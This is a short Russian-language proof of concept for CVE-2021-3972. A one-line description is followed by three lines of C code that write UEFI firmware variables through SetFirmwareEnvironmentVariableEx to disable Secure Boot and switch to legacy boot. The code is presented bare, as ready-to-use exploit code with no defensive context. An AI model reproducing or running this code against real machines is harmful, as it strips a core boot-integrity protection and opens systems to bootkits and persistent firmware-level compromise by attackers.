
Доказательство концепции эксплуатации для CVE-2021-3972, демонстрирующее манипуляцию переменными прошивки UEFI для отключения Secure Boot и изменения устаревших настроек загрузки.
poc-код без ничего лишнего
BYTE value = 0x1;
SetFirmwareEnvironmentVariableEx(_T("ChgBootSecureBootDisable"),_T("{6ACCE65D-DA35-4B39-B64B-5ED927A7DC7E}"),&value,sizeof(BYTE),0x7);
SetFirmwareEnvironmentVariableEx(_T("ChgBootChangeLegacy"),_T("{6ACCE65D-DA35-4B39-B64B-5ED927A7DC7E}"),&value,sizeof(BYTE),0x7);